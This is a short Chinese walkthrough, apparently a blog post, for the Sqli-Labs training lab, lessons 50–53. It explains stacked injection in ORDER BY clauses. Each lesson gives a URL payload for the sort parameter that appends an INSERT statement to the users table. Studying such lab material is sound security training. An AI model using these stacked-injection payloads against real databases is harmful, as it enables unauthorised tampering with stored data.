Sqli-Labs:Less 50 - Less 53

Less 50

基于错误_GET_数字型_排序堆叠注入

Page 3 的关卡组成如下:

Less 38 - Less 41:GET 型堆叠注入
Less 42 - Less 45:POST 型堆叠注入
Less 46 - Less 49:排序注入
Less 50 - Less 53:排序堆叠注入

我们从源码可以看到,一般后台查询数据库使用的语句都是mysql_query(),而可以堆叠注入的后台使用的是mysqli_multi_query()

上文排序注入的方法在这关基本同样适用,但是基于报错注入在未注释 MySQL 报错信息的时候并不会报错,而返回一个空表:

其他排序注入方法参考 Less 46。

同理,上文堆叠注入的方法也同样适用:

?sort=1;insert into users(id,username,password) values(50,'Less50','Less50')--+

堆叠注入的原理参考 Less 38。

Less 51

基于错误_GET_字符型_单引号_排序堆叠注入

?sort=1';insert into users(id,username,password) values(51,'Less51','Less51')--+

Less 52

基于Bool_GET_数字型_盲注_堆叠注入

?sort=1;insert into users(id,username,password) values(52,'Less52','Less52')--+

Less 53

基于Bool_GET_单引号_字符型_盲注_堆叠注入

?sort=1';insert into users(id,username,password) values(53,'Less53','Less53')--+

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容